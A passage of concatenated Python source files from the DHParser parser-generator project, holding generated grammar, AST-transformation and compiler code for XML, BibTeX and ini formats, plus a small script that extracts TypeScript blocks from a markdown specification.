if not condition:
self.tree.add_error(node, err_msg)
def value_constraint(self, node, value, allowed):
"""If value is not in allowed, an error is issued."""
        self.validity_constraint(node, value in allowed,
            'Invalid value "%s" for "standalone"! Must be one of %s.' % (value, str(allowed)))
def on_document(self, node):
self.tree.string_tags.update({'CharData', 'document'})
# TODO: Remove the following line. It is specific for testing with example.xml!
self.tree.inline_tags.update({'to', 'from', 'heading', 'body', 'remark'})
return self.fallback_compiler(node)
# def on_prolog(self, node):
# return node
def on_XMLDecl(self, node):
attributes = dict()
for child in node.children:
s = child.content
if child.tag_name == "VersionInfo":
attributes['version'] = s
elif child.tag_name == "EncodingDecl":
attributes['encoding'] = s
elif child.tag_name == "SDDecl":
attributes['standalone'] = s
self.value_constraint(node, s, {'yes', 'no'})
if attributes:
node.attr.update(attributes)
node.result = ''
self.tree.empty_tags.add('?xml')
node.tag_name = '?xml' # node.parser = self.get_parser('?xml')
return node
# def on_VersionInfo(self, node):
# return node
# def on_VersionNum(self, node):
# return node
# def on_EncodingDecl(self, node):
# return node
# def on_EncName(self, node):
# return node
# def on_SDDecl(self, node):
# return node
# def on_Yes(self, node):
# return node
# def on_No(self, node):
# return node
# def on_doctypedecl(self, node):
# return node
# def on_intSubset(self, node):
# return node
# def on_DeclSep(self, node):
# return node
# def on_markupdecl(self, node):
# return node
# def on_extSubset(self, node):
# return node
# def on_extSubsetDecl(self, node):
# return node
# def on_conditionalSect(self, node):
# return node
# def on_includeSect(self, node):
# return node
# def on_ignoreSect(self, node):
# return node
# def on_ignoreSectContents(self, node):
# return node
# def on_extParsedEnt(self, node):
# return node
# def on_TextDecl(self, node):
# return node
# def on_elementdecl(self, node):
# return node
# def on_contentspec(self, node):
# return node
# def on_EMPTY(self, node):
# return node
# def on_ANY(self, node):
# return node
# def on_Mixed(self, node):
# return node
# def on_children(self, node):
# return node
# def on_choice(self, node):
# return node
# def on_cp(self, node):
# return node
# def on_seq(self, node):
# return node
# def on_AttlistDecl(self, node):
# return node
# def on_AttDef(self, node):
# return node
# def on_AttType(self, node):
# return node
# def on_StringType(self, node):
# return node
# def on_TokenizedType(self, node):
# return node
# def on_ID(self, node):
# return node
# def on_IDREF(self, node):
# return node
# def on_IDREFS(self, node):
# return node
# def on_ENTITY(self, node):
# return node
# def on_ENTITIES(self, node):
# return node
# def on_NMTOKEN(self, node):
# return node
# def on_NMTOKENS(self, node):
# return node
# def on_EnumeratedType(self, node):
# return node
# def on_NotationType(self, node):
# return node
# def on_Enumeration(self, node):
# return node
# def on_DefaultDecl(self, node):
# return node
# def on_REQUIRED(self, node):
# return node
# def on_IMPLIED(self, node):
# return node
# def on_FIXED(self, node):
# return node
# def on_EntityDecl(self, node):
# return node
# def on_GEDecl(self, node):
# return node
# def on_PEDecl(self, node):
# return node
# def on_EntityDef(self, node):
# return node
# def on_PEDef(self, node):
# return node
# def on_NotationDecl(self, node):
# return node
# def on_ExternalID(self, node):
# return node
# def on_PublicID(self, node):
# return node
# def on_NDataDecl(self, node):
# return node
def on_element(self, node):
stag = node['STag']
tag_name = stag['Name'].content
attributes = self.extract_attributes(stag.children)
preserve_whitespace = tag_name in self.tree.inline_tags
if attributes:
node.attr.update(attributes)
preserve_whitespace |= attributes.get('xml:space', '') == 'preserve'
node.tag_name = tag_name
content = tuple(self.compile(nd) for nd in node.get('content', PLACEHOLDER).children)
if len(content) == 1:
if content[0].tag_name == "CharData":
# reduce single CharData children
content = content[0].content
elif self.cleanup_whitespace and not preserve_whitespace:
# remove CharData that consists only of whitespace from mixed elements
content = tuple(child for child in content
if child.tag_name != "CharData" or child.content.strip() != '')
node.result = content
return node
# def on_STag(self, node):
# return node
# def on_ETag(self, node):
# return node
def on_emptyElement(self, node):
attributes = self.extract_attributes(node.children)
if attributes:
node.attr.update(attributes)
node.tag_name = node['Name'].content # node.parser = self.get_parser(node['Name'].content)
node.result = ''
self.tree.empty_tags.add(node.tag_name)
return node
# def on_TagName(self, node):
# return node
# def on_Attribute(self, node):
# return node
# def on_content(self, node):
# return node
# def on_EntityValue(self, node):
# return node
# def on_AttValue(self, node):
# return node
# def on_SystemLiteral(self, node):
# return node
# def on_PubidLiteral(self, node):
# return node
# def on_Reference(self, node):
# return node
# def on_EntityRef(self, node):
# return node
# def on_PEReference(self, node):
# return node
# def on_Nmtokens(self, node):
# return node
# def on_Nmtoken(self, node):
# return node
# def on_Names(self, node):
# return node
# def on_Name(self, node):
# return node
# def on_NameStartChar(self, node):
# return node
# def on_NameChars(self, node):
# return node
# def on_Misc(self, node):
# return node
# def on_Comment(self, node):
# return node
# def on_PI(self, node):
# return node
# def on_PITarget(self, node):
# return node
# def on_CDSect(self, node):
# return node
# def on_PubidCharsSingleQuoted(self, node):
# return node
# def on_PubidChars(self, node):
# return node
# def on_CharData(self, node):
# return node
# def on_CData(self, node):
# return node
# def on_IgnoreChars(self, node):
# return node
# def on_PIChars(self, node):
# return node
# def on_CommentChars(self, node):
# return node
# def on_CharRef(self, node):
# return node
# def on_Chars(self, node):
# return node
# def on_Char(self, node):
# return node
# def on_S(self, node):
# return node
# def on_EOF(self, node):
# return node
def get_compiler() -> XMLCompiler:
"""Returns a thread/process-exclusive XMLCompiler-singleton."""
THREAD_LOCALS = access_thread_locals()
try:
compiler = THREAD_LOCALS.XML_00000001_compiler_singleton
except AttributeError:
THREAD_LOCALS.XML_00000001_compiler_singleton = XMLCompiler()
compiler = THREAD_LOCALS.XML_00000001_compiler_singleton
return compiler
#######################################################################
#
# END OF DHPARSER-SECTIONS
#
#######################################################################
def compile_src(source):
"""Compiles ``source`` and returns (result, errors, ast).
"""
result_tuple = compile_source(source, get_preprocessor(), get_grammar(), get_transformer(),
get_compiler())
return result_tuple
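# Usage sketch (assumption: "example.xml" names a well-formed XML file):
#
#     result, errors, ast = compile_src("example.xml")
#     if not errors:
#         print(result.as_xml())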
if __name__ == "__main__":
# recompile grammar if needed
if __file__.endswith('Parser.py'):
grammar_path = os.path.abspath(__file__).replace('Parser.py', '.ebnf')
else:
grammar_path = os.path.splitext(__file__)[0] + '.ebnf'
parser_update = False
def notify():
global parser_update
parser_update = True
print('recompiling ' + grammar_path)
if os.path.exists(grammar_path) and os.path.isfile(grammar_path):
if not recompile_grammar(grammar_path, force=False, notify=notify):
error_file = os.path.basename(__file__).replace('Parser.py', '_ebnf_ERRORS.txt')
with open(error_file, encoding="utf-8") as f:
print(f.read())
sys.exit(1)
elif parser_update:
print(os.path.basename(__file__) + ' has changed. '
'Please run again in order to apply updated compiler')
sys.exit(0)
else:
print('Could not check whether grammar requires recompiling, '
'because grammar was not found at: ' + grammar_path)
from argparse import ArgumentParser
parser = ArgumentParser(description="Parses a XML-file and shows its syntax-tree.")
parser.add_argument('files', nargs=1)
parser.add_argument('-d', '--debug', action='store_const', const='debug')
parser.add_argument('-x', '--xml', action='store_const', const='xml')
args = parser.parse_args()
file_name, log_dir = args.files[0], ''
if not os.path.exists(file_name):
print('File "%s" not found!' % file_name)
sys.exit(1)
if not os.path.isfile(file_name):
print('"%" is not a file!' % file_name)
sys.exit(1)
if args.debug is not None:
log_dir = 'LOGS'
set_config_value('history_tracking', True)
set_config_value('resume_notices', True)
set_config_value('log_syntax_trees', set(('cst', 'ast')))
start_logging(log_dir)
result, errors, _ = compile_src(file_name)
if errors:
cwd = os.getcwd()
rel_path = file_name[len(cwd):] if file_name.startswith(cwd) else file_name
for error in errors:
print(rel_path + ':' + str(error))
sys.exit(1)
else:
print(result.serialize(how='default' if args.xml is None else 'xml')
if isinstance(result, Node) else result)
```
#### File: experimental/BibTeX/BibTeXParser.py
```python
from functools import partial
import os
import sys
try:
import regex as re
except ImportError:
import re
dhparser_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../examples', '..'))
if dhparser_path not in sys.path:
sys.path.append(dhparser_path)
from DHParser import is_filename, load_if_file, get_config_value, \
Grammar, Compiler, nil_preprocessor, access_thread_locals, \
Lookbehind, Lookahead, Alternative, Pop, Required, Text, Synonym, \
Option, NegativeLookbehind, OneOrMore, RegExp, Retrieve, Series, Capture, \
ZeroOrMore, Forward, NegativeLookahead, mixin_comment, compile_source, \
last_value, matching_bracket, PreprocessorFunc, \
Node, TransformationDict, Whitespace, \
traverse, remove_children_if, is_anonymous, \
reduce_single_child, replace_by_single_child, replace_or_reduce, remove_whitespace, \
remove_empty, remove_tokens, flatten, \
is_empty, collapse, remove_children, remove_content, remove_brackets, change_tag_name, \
keep_children, is_one_of, has_content, apply_if, \
WHITESPACE_PTYPE, TOKEN_PTYPE, THREAD_LOCALS
from DHParser.transform import TransformationFunc
from DHParser.log import start_logging
#######################################################################
#
# PREPROCESSOR SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
def BibTeXPreprocessor(text):
return text
def get_preprocessor() -> PreprocessorFunc:
return BibTeXPreprocessor
#######################################################################
#
# PARSER SECTION - Don't edit! CHANGES WILL BE OVERWRITTEN!
#
#######################################################################
class BibTeXGrammar(Grammar):
r"""Parser for a BibTeX source file.
"""
text = Forward()
source_hash__ = "f070f9a8eaff76cdd1669dcb63d8b8f3"
disposable__ = re.compile('..(?<=^)')
static_analysis_pending__ = [] # type: List[bool]
parser_initialization__ = ["upon instantiation"]
COMMENT__ = r'(?i)%[^\n]*\n'
comment_rx__ = re.compile(COMMENT__)
WHITESPACE__ = r'\s*'
WSP_RE__ = mixin_comment(whitespace=WHITESPACE__, comment=COMMENT__)
wsp__ = Whitespace(WSP_RE__)
EOF = NegativeLookahead(RegExp('(?i).'))
WS = Alternative(Series(Lookahead(RegExp('(?i)[ \\t]*%')), wsp__), RegExp('(?i)[ \\t]+'))
ESC = Series(Lookbehind(RegExp('(?i)\\\\')), RegExp('(?i)[%&_]'))
CONTENT_STRING = OneOrMore(Alternative(RegExp('(?i)[^{}%&_ \\t]+'), ESC, WS))
COMMA_TERMINATED_STRING = ZeroOrMore(Alternative(RegExp('(?i)[^,%&_ \\t]+'), ESC, WS))
NO_BLANK_STRING = Series(OneOrMore(Alternative(RegExp('(?i)[^ \\t\\n,%&_]+'), ESC)), wsp__)
WORD = Series(RegExp('(?i)\\w+'), wsp__)
text.set(ZeroOrMore(Alternative(CONTENT_STRING, Series(Series(Text("{"), wsp__), text, Series(Text("}"), wsp__)))))
plain_content = Synonym(COMMA_TERMINATED_STRING)
content = Alternative(Series(Series(Text("{"), wsp__), text, Series(Text("}"), wsp__)), plain_content)
field = Synonym(WORD)
key = Synonym(NO_BLANK_STRING)
type = Synonym(WORD)
entry = Series(RegExp('(?i)@'), type, Series(Text("{"), wsp__), key, ZeroOrMore(Series(Series(Text(","), wsp__), field, Series(Text("="), wsp__), content, mandatory=2)), Option(Series(Text(","), wsp__)), Series(Text("}"), wsp__), mandatory=6)
comment = Series(Series(Text("@Comment{"), wsp__), text, Series(Text("}"), wsp__), mandatory=2)
pre_code = ZeroOrMore(Alternative(RegExp('(?i)[^"%]+'), RegExp('(?i)%.*\\n')))
preamble = Series(Series(Text("@Preamble{"), wsp__), RegExp('(?i)"'), pre_code, RegExp('(?i)"'), wsp__, Series(Text("}"), wsp__), mandatory=5)
bibliography = Series(ZeroOrMore(Alternative(preamble, comment, entry)), wsp__, EOF)
root__ = bibliography
def get_grammar() -> BibTeXGrammar:
"""Returns a thread/process-exclusive BibTeXGrammar-singleton."""
THREAD_LOCALS = access_thread_locals()
try:
grammar = THREAD_LOCALS.BibTeX_00000001_grammar_singleton
except AttributeError:
THREAD_LOCALS.BibTeX_00000001_grammar_singleton = BibTeXGrammar()
if hasattr(get_grammar, 'python_src__'):
THREAD_LOCALS.BibTeX_00000001_grammar_singleton.python_src__ = get_grammar.python_src__
grammar = THREAD_LOCALS.BibTeX_00000001_grammar_singleton
if get_config_value('resume_notices'):
resume_notices_on(grammar)
elif get_config_value('history_tracking'):
set_tracer(grammar, trace_history)
return grammar
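# Usage sketch (hedged): Grammar instances are callable, so a single entry can
# be parsed directly. The entry below is invented for illustration.
#
#     syntax_tree = get_grammar()('@article{doe2020, title = {A Title}}')
#     print(syntax_tree.as_sxpr())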
#######################################################################
#
# AST SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
BibTeX_AST_transformation_table = {
# AST Transformations for the BibTeX-grammar
"<": remove_empty,
"bibliography": [],
"preamble": [],
"pre_code": [],
"comment": [],
"entry": [],
"type": [],
"key": [],
"field": [],
"content": [replace_or_reduce],
"plain_content": [],
"text": [],
":_Token, :_RE": reduce_single_child,
"*": replace_by_single_child
}
def BibTeXTransform() -> TransformationFunc:
return partial(traverse, processing_table=BibTeX_AST_transformation_table.copy())
def get_transformer() -> TransformationFunc:
global thread_local_BibTeX_transformer_singleton
try:
transformer = thread_local_BibTeX_transformer_singleton
except NameError:
thread_local_BibTeX_transformer_singleton = BibTeXTransform()
transformer = thread_local_BibTeX_transformer_singleton
return transformer
#######################################################################
#
# COMPILER SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
class BibTeXCompiler(Compiler):
"""Compiler for the abstract-syntax-tree of a BibTeX source file.
"""
def on_bibliography(self, node):
return node
def on_preamble(self, node):
pass
def on_pre_code(self, node):
pass
def on_comment(self, node):
pass
def on_entry(self, node):
pass
def on_type(self, node):
pass
def on_key(self, node):
pass
def on_field(self, node):
pass
def on_content(self, node):
pass
def on_plain_content(self, node):
pass
def on_text(self, node):
pass
def get_compiler() -> BibTeXCompiler:
global thread_local_BibTeX_compiler_singleton
try:
compiler = thread_local_BibTeX_compiler_singleton
except NameError:
thread_local_BibTeX_compiler_singleton = BibTeXCompiler()
compiler = thread_local_BibTeX_compiler_singleton
return compiler
#######################################################################
#
# END OF DHPARSER-SECTIONS
#
#######################################################################
def compile_src(source):
"""Compiles ``source`` and returns (result, errors, ast).
"""
start_logging("LOGS")
compiler = get_compiler()
cname = compiler.__class__.__name__
log_file_name = os.path.basename(os.path.splitext(source)[0]) \
        if is_filename(source) else cname[:cname.find('.')] + '_out'
result = compile_source(source, get_preprocessor(),
get_grammar(),
get_transformer(), compiler)
return result
if __name__ == "__main__":
if len(sys.argv) > 1:
result, errors, ast = compile_src(sys.argv[1])
if errors:
for error in errors:
print(error)
sys.exit(1)
else:
print(result.as_xml() if isinstance(result, Node) else result)
else:
print("Usage: BibTeXParser.py [FILENAME]")
```
#### File: experimental/ini/iniParser.py
```python
import collections
from functools import partial
import os
import sys
from typing import Tuple, List, Union, Any, Optional, Callable
try:
scriptpath = os.path.dirname(__file__)
except NameError:
scriptpath = ''
dhparser_parentdir = os.path.abspath(os.path.join(scriptpath, '..', '..'))
if scriptpath not in sys.path:
sys.path.append(scriptpath)
if dhparser_parentdir not in sys.path:
sys.path.append(dhparser_parentdir)
try:
import regex as re
except ImportError:
import re
from DHParser import start_logging, suspend_logging, resume_logging, is_filename, load_if_file, \
Grammar, Compiler, nil_preprocessor, PreprocessorToken, Whitespace, Drop, AnyChar, \
Lookbehind, Lookahead, Alternative, Pop, Text, Synonym, Counted, Interleave, INFINITE, \
Option, NegativeLookbehind, OneOrMore, RegExp, Retrieve, Series, Capture, TreeReduction, \
ZeroOrMore, Forward, NegativeLookahead, Required, CombinedParser, mixin_comment, \
compile_source, grammar_changed, last_value, matching_bracket, PreprocessorFunc, is_empty, \
remove_if, Node, TransformationDict, TransformerCallable, transformation_factory, traverse, \
remove_children_if, move_adjacent, normalize_whitespace, is_anonymous, matches_re, \
reduce_single_child, replace_by_single_child, replace_or_reduce, remove_whitespace, \
replace_by_children, remove_empty, remove_tokens, flatten, all_of, any_of, \
merge_adjacent, collapse, collapse_children_if, transform_content, WHITESPACE_PTYPE, \
TOKEN_PTYPE, remove_children, remove_content, remove_brackets, change_tag_name, \
remove_anonymous_tokens, keep_children, is_one_of, not_one_of, has_content, apply_if, peek, \
remove_anonymous_empty, keep_nodes, traverse_locally, strip, lstrip, rstrip, \
transform_content, replace_content_with, forbid, assert_content, remove_infix_operator, \
add_error, error_on, recompile_grammar, left_associative, lean_left, set_config_value, \
get_config_value, node_maker, access_thread_locals, access_presets, PreprocessorResult, \
finalize_presets, ErrorCode, RX_NEVER_MATCH, set_tracer, resume_notices_on, \
trace_history, has_descendant, neg, has_ancestor, optional_last_value, insert, \
positions_of, replace_tag_names, add_attributes, delimit_children, merge_connected, \
has_attr, has_parent, ThreadLocalSingletonFactory, Error, canonical_error_strings, \
has_errors, ERROR, FATAL, set_preset_value, get_preset_value, NEVER_MATCH_PATTERN, \
gen_find_include_func, preprocess_includes, make_preprocessor, chain_preprocessors
#######################################################################
#
# PREPROCESSOR SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
RE_INCLUDE = NEVER_MATCH_PATTERN
# To capture includes, replace the NEVER_MATCH_PATTERN
# by a pattern with group "name" here, e.g. r'\input{(?P<name>.*)}'
def iniTokenizer(original_text) -> Tuple[str, List[Error]]:
# Here, a function body can be filled in that adds preprocessor tokens
# to the source code and returns the modified source.
return original_text, []
def preprocessor_factory() -> PreprocessorFunc:
# below, the second parameter must always be the same as iniGrammar.COMMENT__!
find_next_include = gen_find_include_func(RE_INCLUDE, '#.*')
include_prep = partial(preprocess_includes, find_next_include=find_next_include)
tokenizing_prep = make_preprocessor(iniTokenizer)
return chain_preprocessors(include_prep, tokenizing_prep)
get_preprocessor = ThreadLocalSingletonFactory(preprocessor_factory, ident=1)
def preprocess_ini(source):
return get_preprocessor()(source)
#######################################################################
#
# PARSER SECTION - Don't edit! CHANGES WILL BE OVERWRITTEN!
#
#######################################################################
class iniGrammar(Grammar):
r"""Parser for an ini source file.
"""
source_hash__ = "3c1c553d5d0e95aee47ffb654683f53b"
disposable__ = re.compile('EOF$|TEXTLINE$')
static_analysis_pending__ = [] # type: List[bool]
parser_initialization__ = ["upon instantiation"]
COMMENT__ = r'#.*'
comment_rx__ = re.compile(COMMENT__)
WHITESPACE__ = r'\s*'
WSP_RE__ = mixin_comment(whitespace=WHITESPACE__, comment=COMMENT__)
wsp__ = Whitespace(WSP_RE__)
dwsp__ = Drop(Whitespace(WSP_RE__))
EOF = Drop(NegativeLookahead(RegExp('.')))
TEXTLINE = RegExp('[^"\\n]*')
value = Series(Drop(Text('"')), TEXTLINE, Series(Drop(Text('"')), dwsp__), mandatory=1)
identifier = Series(RegExp('\\w+'), dwsp__)
entry = Series(identifier, Series(Drop(Text(":")), dwsp__), value, mandatory=1)
heading = Series(Series(Drop(Text("[")), dwsp__), identifier, Series(Drop(Text("]")), dwsp__), mandatory=1)
section = Series(heading, ZeroOrMore(entry))
ini_file = Series(dwsp__, ZeroOrMore(section), EOF)
resume_rules__ = {'heading': [re.compile(r'\n\s*(?=\w|\[)')],
'entry': [re.compile(r'\n\s*(?=\w|\[)')]}
root__ = ini_file
_raw_grammar = ThreadLocalSingletonFactory(iniGrammar, ident=1)
def get_grammar() -> iniGrammar:
grammar = _raw_grammar()
if get_config_value('resume_notices'):
resume_notices_on(grammar)
elif get_config_value('history_tracking'):
set_tracer(grammar, trace_history)
try:
if not grammar.__class__.python_src__:
grammar.__class__.python_src__ = get_grammar.python_src__
except AttributeError:
pass
return grammar
def parse_ini(document, start_parser = "root_parser__", *, complete_match=True):
return get_grammar()(document, start_parser, complete_match)
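# Usage sketch (illustrative): parse a short ini snippet. Values must be
# double-quoted according to the grammar above.
#
#     tree = parse_ini('[server]\nhost: "localhost"\n')
#     print(tree.as_sxpr())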
#######################################################################
#
# AST SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
ini_AST_transformation_table = {
# AST Transformations for the ini-grammar
# "<": flatten
# "*": replace_by_single_child
# ">: []
"ini_file": [],
"section": [],
"heading": [],
"entry": [],
"identifier": [],
"value": [],
"TEXTLINE": [],
"EOF": [],
}
def iniTransformer() -> TransformerCallable:
"""Creates a transformation function that does not share state with other
threads or processes."""
return partial(traverse, processing_table=ini_AST_transformation_table.copy())
get_transformer = ThreadLocalSingletonFactory(iniTransformer, ident=1)
def transform_ini(cst):
return get_transformer()(cst)
#######################################################################
#
# COMPILER SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
class iniCompiler(Compiler):
"""Compiler for the abstract-syntax-tree of a ini source file.
"""
def __init__(self):
super(iniCompiler, self).__init__()
def reset(self):
super().reset()
# initialize your variables here, not in the constructor!
def on_ini_file(self, node):
return self.fallback_compiler(node)
# def on_section(self, node):
# return node
# def on_heading(self, node):
# return node
# def on_entry(self, node):
# return node
# def on_identifier(self, node):
# return node
# def on_value(self, node):
# return node
# def on_TEXTLINE(self, node):
# return node
# def on_EOF(self, node):
# return node
get_compiler = ThreadLocalSingletonFactory(iniCompiler, ident=1)
def compile_ini(ast):
return get_compiler()(ast)
#######################################################################
#
# END OF DHPARSER-SECTIONS
#
#######################################################################
RESULT_FILE_EXTENSION = ".sxpr" # Change this according to your needs!
def compile_src(source: str) -> Tuple[Any, List[Error]]:
"""Compiles ``source`` and returns (result, errors)."""
result_tuple = compile_source(source, get_preprocessor(), get_grammar(), get_transformer(),
get_compiler())
return result_tuple[:2] # drop the AST at the end of the result tuple
def serialize_result(result: Any) -> Union[str, bytes]:
"""Serialization of result. REWRITE THIS, IF YOUR COMPILATION RESULT
IS NOT A TREE OF NODES.
"""
if isinstance(result, Node):
return result.serialize(how='default' if RESULT_FILE_EXTENSION != '.xml' else 'xml')
else:
return repr(result)
def process_file(source: str, result_filename: str = '') -> str:
"""Compiles the source and writes the serialized results back to disk,
    unless any fatal errors have occurred. Error and warning messages are
    written to a file with the same name as `result_filename`, but with
    "_ERRORS.txt" or "_WARNINGS.txt" in place of the name's extension.
    Returns the name of the error-messages file or an empty string, if no
    errors or warnings occurred.
"""
source_filename = source if is_filename(source) else ''
result, errors = compile_src(source)
if not has_errors(errors, FATAL):
if os.path.abspath(source_filename) != os.path.abspath(result_filename):
with open(result_filename, 'w') as f:
f.write(serialize_result(result))
else:
errors.append(Error('Source and destination have the same name "%s"!'
% result_filename, 0, FATAL))
if errors:
err_ext = '_ERRORS.txt' if has_errors(errors, ERROR) else '_WARNINGS.txt'
err_filename = os.path.splitext(result_filename)[0] + err_ext
with open(err_filename, 'w') as f:
f.write('\n'.join(canonical_error_strings(errors)))
return err_filename
return ''
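# Usage sketch (file names are assumptions; the output directory must exist):
#
#     err_file = process_file('config.ini', 'out/config.sxpr')
#     if err_file:
#         print('Messages written to: ' + err_file)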
def batch_process(file_names: List[str], out_dir: str,
*, submit_func: Callable = None,
log_func: Callable = None) -> List[str]:
"""Compiles all files listed in filenames and writes the results and/or
error messages to the directory `our_dir`. Returns a list of error
messages files.
"""
error_list = []
def gen_dest_name(name):
return os.path.join(out_dir, os.path.splitext(os.path.basename(name))[0] \
+ RESULT_FILE_EXTENSION)
def run_batch(submit_func: Callable):
nonlocal error_list
err_futures = []
for name in file_names:
dest_name = gen_dest_name(name)
err_futures.append(submit_func(process_file, name, dest_name))
for file_name, err_future in zip(file_names, err_futures):
error_filename = err_future.result()
if log_func:
log_func('Compiling "%s"' % file_name)
if error_filename:
error_list.append(error_filename)
if submit_func is None:
import concurrent.futures
from DHParser.toolkit import instantiate_executor
with instantiate_executor(get_config_value('batch_processing_parallelization'),
concurrent.futures.ProcessPoolExecutor) as pool:
run_batch(pool.submit)
else:
run_batch(submit_func)
return error_list
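# Usage sketch (hedged): `batch_process` only requires that `submit_func`
# returns future-like objects with a `result()` method. A minimal synchronous
# stand-in (names are assumptions) could look like this:
#
#     class _Done:
#         def __init__(self, value):
#             self._value = value
#         def result(self):
#             return self._value
#
#     def submit_now(func, *args):
#         return _Done(func(*args))
#
#     failed = batch_process(['a.ini', 'b.ini'], 'out', submit_func=submit_now)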
if __name__ == "__main__":
# recompile grammar if needed
script_path = os.path.abspath(__file__)
if script_path.endswith('Parser.py'):
grammar_path = script_path.replace('Parser.py', '.ebnf')
else:
grammar_path = os.path.splitext(script_path)[0] + '.ebnf'
parser_update = False
def notify():
global parser_update
parser_update = True
print('recompiling ' + grammar_path)
if os.path.exists(grammar_path) and os.path.isfile(grammar_path):
if not recompile_grammar(grammar_path, script_path, force=False, notify=notify):
error_file = os.path.basename(__file__).replace('Parser.py', '_ebnf_ERRORS.txt')
with open(error_file, encoding="utf-8") as f:
print(f.read())
sys.exit(1)
elif parser_update:
print(os.path.basename(__file__) + ' has changed. '
'Please run again in order to apply updated compiler')
sys.exit(0)
else:
print('Could not check whether grammar requires recompiling, '
'because grammar was not found at: ' + grammar_path)
from argparse import ArgumentParser
parser = ArgumentParser(description="Parses a ini-file and shows its syntax-tree.")
parser.add_argument('files', nargs='+')
parser.add_argument('-d', '--debug', action='store_const', const='debug',
help='Store debug information in LOGS subdirectory')
parser.add_argument('-x', '--xml', action='store_const', const='xml',
help='Store result as XML instead of S-expression')
parser.add_argument('-o', '--out', nargs=1, default=['out'],
help='Output directory for batch processing')
parser.add_argument('-v', '--verbose', action='store_const', const='verbose',
help='Verbose output')
parser.add_argument('--singlethread', action='store_const', const='singlethread',
help='Run batch jobs in a single thread (recommended only for debugging)')
args = parser.parse_args()
file_names, out, log_dir = args.files, args.out[0], ''
# if not os.path.exists(file_name):
# print('File "%s" not found!' % file_name)
# sys.exit(1)
# if not os.path.isfile(file_name):
# print('"%s" is not a file!' % file_name)
# sys.exit(1)
if args.debug is not None:
log_dir = 'LOGS'
access_presets()
set_preset_value('history_tracking', True)
set_preset_value('resume_notices', True)
set_preset_value('log_syntax_trees', frozenset(['cst', 'ast'])) # don't use a set literal, here!
finalize_presets()
start_logging(log_dir)
if args.singlethread:
set_config_value('batch_processing_parallelization', False)
if args.xml:
RESULT_FILE_EXTENSION = '.xml'
def echo(message: str):
if args.verbose:
print(message)
batch_processing = True
if len(file_names) == 1:
if os.path.isdir(file_names[0]):
dir_name = file_names[0]
echo('Processing all files in directory: ' + dir_name)
file_names = [os.path.join(dir_name, fn) for fn in os.listdir(dir_name)
if os.path.isfile(os.path.join(dir_name, fn))]
elif not ('-o' in sys.argv or '--out' in sys.argv):
batch_processing = False
if batch_processing:
if not os.path.exists(out):
os.mkdir(out)
elif not os.path.isdir(out):
print('Output directory "%s" exists and is not a directory!' % out)
sys.exit(1)
error_files = batch_process(file_names, out, log_func=print if args.verbose else None)
if error_files:
category = "ERRORS" if any(f.endswith('_ERRORS.txt') for f in error_files) \
else "warnings"
print("There have been %s! Please check files:" % category)
print('\n'.join(error_files))
if category == "ERRORS":
sys.exit(1)
else:
result, errors = compile_src(file_names[0])
if errors:
for err_str in canonical_error_strings(errors):
print(err_str)
if has_errors(errors, ERROR):
sys.exit(1)
print(result.serialize(how='default' if args.xml is None else 'xml')
if isinstance(result, Node) else result)
```
#### File: ts2dataclass/scripts/extract_ts_from_lsp.py
```python
def extract(source, dest):
with open(source, 'r', encoding='utf-8') as f:
src = f.read()
lines = src.split('\n')
ts = []
copy_flag = False
    for line in lines:
        if line.strip() == '```typescript':
            copy_flag = True
        elif line.strip() == '```':
            copy_flag = False
            ts.append('')
        elif copy_flag:
            ts.append(line)
with open(dest, 'w', encoding='utf-8') as f:
f.write('\n'.join(ts))
if __name__ == "__main__":
import sys
if len(sys.argv) > 1:
source = sys.argv[1]
else:
source = "lsp-specification_3.16.md"
i = source.rfind('.')
if i < 0:
i = len(source)
dest = source[:i] + '.ts'
extract(source, dest)
```
#### File: experimental/XMLSnippet/XMLSnippetParser.py
```python
import collections
from functools import partial
import os
import sys
dhparser_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../examples', '..'))
if dhparser_path not in sys.path:
sys.path.append(dhparser_path)
try:
import regex as re
except ImportError:
import re
from DHParser import start_logging, suspend_logging, resume_logging, is_filename, load_if_file, \
Grammar, Compiler, nil_preprocessor, PreprocessorToken, Whitespace, Drop, \
Lookbehind, Lookahead, Alternative, Pop, Text, Synonym, \
Option, NegativeLookbehind, OneOrMore, RegExp, Retrieve, Series, Capture, \
ZeroOrMore, Forward, NegativeLookahead, Required, mixin_comment, compile_source, \
grammar_changed, last_value, matching_bracket, PreprocessorFunc, is_empty, remove_if, \
Node, TransformationFunc, TransformationDict, transformation_factory, traverse, \
remove_children_if, move_adjacent, normalize_whitespace, is_anonymous, matches_re, \
reduce_single_child, replace_by_single_child, replace_or_reduce, remove_whitespace, \
replace_by_children, remove_empty, remove_tokens, flatten, \
merge_adjacent, collapse, collapse_children_if, WHITESPACE_PTYPE, \
TOKEN_PTYPE, remove_children, remove_content, remove_brackets, change_tag_name, \
remove_anonymous_tokens, keep_children, is_one_of, not_one_of, has_content, apply_if, peek, \
remove_anonymous_empty, keep_nodes, traverse_locally, strip, lstrip, rstrip, \
forbid, assert_content, remove_infix_operator, \
add_error, error_on, recompile_grammar, left_associative, lean_left, set_config_value, \
get_config_value, access_thread_locals, access_presets, \
finalize_presets, ErrorCode, RX_NEVER_MATCH, set_tracer, resume_notices_on, \
trace_history, has_descendant, neg, has_ancestor, ThreadLocalSingletonFactory
#######################################################################
#
# PREPROCESSOR SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
def XMLSnippetPreprocessor(text):
return text, lambda i: i
def get_preprocessor() -> PreprocessorFunc:
return XMLSnippetPreprocessor
#######################################################################
#
# PARSER SECTION - Don't edit! CHANGES WILL BE OVERWRITTEN!
#
#######################################################################
class XMLSnippetGrammar(Grammar):
r"""Parser for a XMLSnippet source file.
"""
element = Forward()
source_hash__ = "ebb52cf647bba2d2f543c86dd3590dbe"
disposable__ = re.compile('..(?<=^)')
static_analysis_pending__ = [] # type: List[bool]
parser_initialization__ = ["upon instantiation"]
COMMENT__ = r''
comment_rx__ = RX_NEVER_MATCH
WHITESPACE__ = r'\s*'
WSP_RE__ = mixin_comment(whitespace=WHITESPACE__, comment=COMMENT__)
wsp__ = Whitespace(WSP_RE__)
dwsp__ = Drop(Whitespace(WSP_RE__))
EOF = NegativeLookahead(RegExp('.'))
S = RegExp('\\s+')
